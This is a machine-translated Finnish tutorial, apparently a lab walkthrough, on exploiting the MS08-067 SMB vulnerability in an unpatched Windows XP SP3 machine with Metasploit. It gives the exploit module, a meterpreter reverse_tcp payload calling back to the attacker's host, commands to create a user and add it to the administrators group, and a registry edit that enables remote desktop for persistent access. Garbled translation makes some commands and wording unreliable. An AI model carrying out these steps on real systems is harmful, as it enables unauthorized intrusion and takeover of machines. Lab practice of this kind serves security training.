Ms08_067_netapi-haavoittuvuuden hyödyntäminen WIN xp sp3 -järjestelmässä

Exploitation Ms08_067_netapi Vulnerability Win Xp Sp3 System



Ms08_067_netapi on jonkin verran vanha ylivuotohyökkäyshyötykuorma Metasploitissa, hyökkäys voi saada suhteellisen korkean viranomaisen
1: Valmistelu: WINxp sp3 -järjestelmä (ilman korjaustiedostoa) lataa linkki: http://blog.csdn.net/sql_injection/article/details/47683419 Hyökkää kali-ip: hen: 192.168.243.133 Kohdekoneen ip: 192.168.243.136 2: Kun valmistelu on valmis, avaa kali ja avaa päätemsfconsole-kehys metasploitissa Komento: msfconsole Sinun on muodostettava yhteys postgresql-tiedostoon ennen metasploitin avaamista: service postgresql statr 3: Etsi ja lataaMs08_067-moduuli (1): Käytä hakukomentoa tämän moduulin etsimiseen:search ms08_067_netapi(2): Sovelluksen hakema moduulin osoite:use exploit/windows/smb/ms08_067_netapi 4:Ladataan hyötykuorma: set payload windows/meterpreter/reverse_tcp
Latauksen jälkeen voit tarkastella asetettavia parametreja:show options
Sitten kuten alla on esitetty:
5: Kuten yllä olevassa kuvassa näkyy, RHOST on dronin ip ja LHOST kalin ip:set RHOST attacked ip set LHOST attacked ipHyökkää sitten:exploit

6: Kun mittari-komento ilmestyy, hyökkäys onnistuu. Tällä hetkellä kirjoita kuori päästäksesi kohdekoneen cmd-käyttöliittymään uuden käyttäjän luomiseksi, ja nosta auktoriteettia:
(1): Luo käyttäjä:user net username password /add
(2): Oikea eskalaatio:net localgroup administrators wmc /add



7: Kun käyttöoikeus on korotettu, voit kirjautua sisään etänä, mutta tarkista tällä hetkellä, onko kohdekone avannut portin 3389, koska tätä porttia käytetään etäyhteyteen: (1): Tarkista, avataanko:netstat -na


(2): Ilmeisesti ei, sitten avaamme sen: REG ADD HKLMSYSTEMCurrentControlSetControlTerminal' 'Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f Kuten näette, portti 3389 on avattu.
8: Käytä sitten omaa paikallista järjestelmääsi etäyhteyden muodostamiseen ja tekemiseen: (1) Avaa cmd ja kirjoita etäyhteyskomento: (2) Kirjoita tietokoneen nimen kohdekoneen ip-osoite tällä hetkellä ja syötä sitten itse luomasi käyttäjänimi ja salasana:
(3): Syötetty onnistuneesti:
Kaikki toiminnot ovat nyt valmiit.Yhteenvetona: Tällä hetkellä luomasi uusi käyttäjä on myös käytettävissä kohteessa. Käytä dronea ilman laastaria, muuten hyökkäys epäonnistuu.